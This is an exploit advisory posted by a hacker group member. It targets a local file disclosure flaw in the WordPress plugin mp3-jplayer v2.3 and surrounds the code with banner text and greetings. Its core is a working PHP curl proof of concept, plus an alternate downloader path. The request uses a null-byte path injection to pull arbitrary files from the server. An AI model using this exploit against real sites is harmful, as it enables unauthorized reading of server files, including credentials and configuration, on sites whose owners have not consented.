> D_x . Made In Algeria . x_Z << # ########################################### # # [>] Title : WordPress plugin (mp3-jplayer v2.3) Local File Disclosure # # [>] Author : KedAns-Dz # [+] E-mail : ked-h (@hotmail.com) # [+] FaCeb0ok : fb.me/K3d.Dz # [+] TwiTter : @kedans # # [#] Platform : PHP / WebApp # [+] Cat/Tag : File Disclosure # # [<] <3 <3 Greetings t0 Palestine <3 <3 # [!] Vendor : http://mp3-jplayer.com # ########################################### # # [!] Description : # # Wordpress plugin mp3-jplayer v2.3 is suffer from local file disclosure, # remote attacker can Download/Disclosure file's from the root-path. # # ExpLO!T : # ------- # $dz = curl_init(); curl_setopt($dz, CURLOPT_URL, "http://[Target]/wp-content/plugins/mp3-jplayer/download.php?mp3=[ LFI ]%00.mp3"); # or ../remote/downloader.php?mp3=[ LFI ]%00.ogg curl_setopt($dz, CURLOPT_HTTPGET, 1); curl_setopt($dz, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($dz, CURLOPT_TIMEOUT, 0); $buf = curl_exec ($dz); curl_close($dz); unset($dz); echo $buf; #### # # Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3 #--------------------------------------------------------------- # Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , # Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic, # & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , & # & KnocKout , Angel Injection , The Black Divels , kaMtiEz , & # & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, & # & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & # PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ; #### # REF : http://k3dsec.blogspot.com/2015/03/wordpress-plugin-mp3-jplayer-v23-local.html ?>